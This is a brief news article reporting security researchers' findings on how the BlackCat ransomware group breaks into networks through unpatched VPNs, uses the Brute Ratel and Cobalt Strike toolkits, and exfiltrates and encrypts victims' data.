BlackCat Ransomware Group Deploys Brute Ratel Pen Testing Kit

According to security company Sophos, the BlackCat ransomware group deployed a new binary in order to aid its intrusion efforts. The company discovered that it is using Brute ratel, which includes remote access features for attackers.

Numerous Sophos customers called the company to inquire about BlackCat ransomware infections. New analysis revealed that the group exploits unpatched VPNs and firewalls to access internal systems.

They used vulnerabilities that were reported in 2018 to access memory from VPN systems, then logged in as authorized users. They used the domain controller passwords to dump and create administrative accounts. They then ran a scanning tool (netscanportable.exe) to find additional targets and then spread internally via RDP. Both Windows and ESXi hypervisor server were targeted.

Read also: Types of penetration test

Cyber-criminals used PowerShell to compromise their targets, downloading Brute Ratel and Cobalt Strike beacons. They then installed a Windows service called wewe.

Brute Ratel was not the only tool used by the attackers. They also used TeamViewer and AnyDesk commercial remote access tools and an open-source alternative called nGrok.

Each ransomware attack involved a customized ransomware binary, which encrypted files and sent a ransom message to each target. The ransom message included a link to the Tor service. Before the binary could run, it required a 64-bit access token.

BlackCat also searched the victim’s networks for sensitive information, sometimes using PowerShell to locate machines in the network. The files were compressed using WinRAR, and then uploaded to their servers. Sophos stated that in some cases they used a Chrome browser to upload the files.

Brute Ratel’s creators describe it as a custom command and control center for adversary simulation and red teaming. However, like Cobalt Strike it can also be used by attackers to compromise victim’s sites.

Palo Alto Networks’ Unit42 research team discovered malicious actors using Brute Ratl earlier in the month. It was considered extremely dangerous due to its inability to be detected by antivirus software and endpoint detection. Unit 42 discovered Brute Ratel in a sample that was uploaded to the malware scanning site Virus Total. This sample was able to dodge detection by 56 antimalware vendors. According to the Unit 42 report, the tool’s users displayed behavior similar Russia’s APT29 hacking team.

Resecurity cybersecurity researchers stated earlier this week that they had identified a significant increase in ransom demand requests from the BlackCat ransomware group.

Leave a Reply

Your email address will not be published. Required fields are marked *